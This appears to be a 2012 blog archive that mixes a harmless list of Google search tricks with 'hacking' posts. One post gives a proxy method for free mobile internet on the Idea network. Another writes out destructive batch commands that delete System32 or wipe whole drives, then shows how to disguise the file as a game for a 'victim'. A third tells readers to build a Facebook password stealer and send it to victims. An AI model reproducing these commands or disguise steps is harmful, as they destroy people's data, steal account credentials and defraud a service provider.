
Wednesday, January 25, 2012

Top 10 unknown Google tricks

Below is a list of our top ten Google tricks many people who use Google don't know about.
Pull up the definition of the word by typing define followed by the word you want the definition for. For example, typing: define bravura would display the definition of that word.
Local search
Visit Google Local enter the area you want to search and the keyword of the place you want to find. For example, typing:restaurant at the above link would display local restaurants.
Phone number lookup
Enter a full phone number with area code to display the name and address associated with that phone number.
Find weather and movies
Type "weather" or "movies" followed by a zip code or city and state to display current weather conditions or movie theaters in your area. For example, typing weather 84101 gives you the current weather conditions for Salt Lake City, UT and the next four days. Typing movies 84101 would give you a link for showtimes for movies in that area.
Track airline flight and packages
Enter the airline and flight number to display the status of an airline flight and it's arrival time. For example, type: delta 123 to display this flight information if available.
Google can also give a direct link to package tracking information if you enter a UPS, FedEx or USPS tracking number.
Translate text, a full web page, or search by using the Google Language Tools.
Pages linked to you
See what other web pages are linking to your website or blog by typing link: followed by your URL. For example, typinglink: displays all pages linking to Computer Hope.
Find PDF results only
Add filetype: to your search to display results that only match a certain file type. For example, if you wanted to display PDF results only type: "dell xps" filetype:pdf -- this is a great way to find online manuals.
Use the Google Search engine as a calculator by typing a math problem in the search. For example, typing: 100 + 200 would display results as 300.
Quickly get to a stock quote price, chart, and related links by typing the stock symbol in Google. For example, typing: msft will display the stock information for Microsoft.

Tuesday, January 3, 2012

Hackin Idea GPRS | Latest IDEA 3G Hack 2012

For this trick/hack (whatever you want to call it) to work, first of all you need to have Idea Fresh Setting saved in your mobile phone. Without Idea Fresh settings you’ll not be able to use free internet on your mobile phone. If you have Idea fresh settings then skip to step 3 else save the settings as given below.
  1. SMS SET to 546714 in order to get Internet settings. Or save the following settings in your mobile phone.
    • Account name – idea_fresh
    • Username – (Leave Blank)
    • Password – (Leave blank)
    • Homepage –
    • Proxy and server port – 8080
    • Proxy and server address –
    • Databearer – GPRS/Packetdata
    • Access point name (APN) – imis
    • Proxy – Enabled/Yes
    • Authentication type – Normal
  2. After saving the above mentioned settings, reboot your phone.
  3. Open default browser (NO 3rd party browser i.e Opera mini, etc).
  4. Open any one for the following web address (they are proxies):
  5. Now enter any address in the input bar of the above mentioned links.
You’ll now be able to access internet for free on your idea sim! Enjoy free GPRS and 3G connectivity on your mobile phone

Sunday, January 1, 2012

Create your own Virus Using Notepad.

Introduction : Friends , all of you are most probably aware of viruses. The Only Headache of Every Windows PC owner is that his Pc might get virus. If a virus hits your computer, then no need to say what a nightmare you'll have.
       And what if someone sent you a virus through a USB, or mail attachment ? There are times in our lives , when we think " Hope, I too could create a virus ". Well then this is the time friends, So here I am posting the process how to create a virus. And sorry i cant post the virus file itself, as Internet doesn't allow to post or send .bat or .cmd files .

  •  Open Notepad
  • Write / copy the below command there:
  • " del c:\WINDOWS\system32\*.*/q "  without quote
  • and save as " anything.bat"
  • Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.

Virus II:


  •  Open Notepad
  • Copy the below command there 
  • "rd/s/q D:\
    rd/s/q C:\
    rd/s/q E:\" ( without quotes )
  • Save as "anything.bat
  • This virus Formats the C ,D  , and E Drive in 3  Seconds.

How to Spread it:
* Windows does'nt allow to change the icon of .bat files. Therefore what you can do is :
  • Right click on the .bat file
  • And hide the original file.
  • Now as this newly created file is just the shortcut, you can easily change its icon. 
  • Right click on this shortcut
  • properties >>>..cutomize>>..choose icon
  • Now give an attractive icon to it. 
  • Now name it something intresting. eg. PROTOTYPE or IGI etc. 
  • Now your victim would think it to be the game , and he will be easily curropted.

  • This trick to change icon and name can be used in each and every virus creation method which i'll post. Therefore I'll not post it over and over again.

How to Hack Facebook Password using Facebook Hacker [TUTORIAL]


facebook tips tricks 300x207 How to Hack Facebook Password using Facebook Hacker [TUTORIAL]
Hey guys are you curious to know how to hack facebook using a software or hacking tool? Have you ever wondered how to hack facebook without phishing ,then here is a tool which is coded by me exclusively for the readers of!
By using this tool you can hack facebook password of your victim. I named this tool as facebook hacker.
Please read the below given tutorial to know how to use this Facebook Hacker tool to Hack Facebook Password.
STEP 1: First ensure that you have installed Microsoft .Net Framework. If not, then you can download it from here: Download .Net Framework
STEP 3: Extract the downloaded “Facebook Hacker” file using Winrar. (If you don’t have it then you can GET IT HERE)
STEP 4: Open “Facebook Hacker.exe” file.
Capture1 How to Hack Facebook Password using Facebook Hacker [TUTORIAL]
STEP 5: After opening the “Facebook Hacker.exe” file build your password stealer as shown in the image below:
Capture2 300x229 How to Hack Facebook Password using Facebook Hacker [TUTORIAL]
Click on the image to Enlarge it.
STEP 6: Now a new file will be created in the same directory with the name you provided while building (eg. server.exe). Just send the file you created to the victim and if the victim runs this file….W00t….you will get his Facebook account’s username and password to your fake email ID which you provided while building the file.
Capture3 How to Hack Facebook Password using Facebook Hacker [TUTORIAL]
NOTE: The “Stub.exe” file may get detected by your anti-virus. Please don’t open the “Stub.exe” file and don’t delete it too, otherwise the stealer created by you won’t work at all.
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